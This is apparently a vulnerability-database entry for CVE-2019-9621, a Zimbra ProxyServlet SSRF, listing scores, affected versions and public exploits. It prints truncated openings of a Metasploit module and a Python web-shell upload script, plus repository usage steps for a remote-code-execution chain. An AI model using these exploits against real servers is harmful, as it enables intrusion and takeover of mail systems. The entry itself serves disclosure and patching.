CVSSv3: 7.5

CVE-2019-9621

Published: 30/04/2019 Updated: 06/06/2019
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 511
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

Zimbra Collaboration Suite prior to 8.6 patch 13, 8.7.x prior to 8.7.11 patch 10, and 8.8.x prior to 8.8.10 patch 7 or 8.8.x prior to 8.8.11 patch 3 allows SSRF via the ProxyServlet component.

Vulnerable Product

zimbra collaboration server 8.6.0

zimbra collaboration server

zimbra collaboration server 8.7.11

zimbra collaboration server 8.8.10

zimbra collaboration server 8.8.11

Exploits

    ##
    # This module requires Metasploit: metasploit.com/download
    # Current source: github.com/rapid7/metasploit-framework
    ##
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::Remote::HttpServer
      include Msf::Exploit::FileDropper
      def initia ...

    #coding=utf8
    import requests
    import sys
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    base_url=sys.argv[1]
    base_url=base_url.rstrip("/")
    #upload file name and content
    #modify by k8gege
    #Connect "shell.jsp" using K8fly CmdShell
    #Because the CMD parameter is ...

Github Repositories

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post

Zimbra-RCE-exploit
RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post
Tested with Zimbra 8.6.0, 8.7.11
Usage:
    $ git clone github.com/nth347/Zimbra-RCE-exploit.git
    $ cd Zimbra-RCE-exploit/
    $ # Edit "Target configuration" part, host the "malicious_dtd" file on a webserver
    $ chmod +x exploit.py
    $ ./exploit.py

Zimbra mail system vulnerabilities: XXE/RCE/SSRF/Upload GetShell Exploit 1. (CVE-2019-9621 Zimbra<8.8.11 XXE GetShell Exploit)

ZimbraExploit: K8Cscan invoking the Zimbra<8.8.11 remote code execution vulnerability GetShell www.cnblogs.com/k8gege/p/10822908.html CVE-2019-9621 Zimbra<8.8.11 XXE GetShell Exploit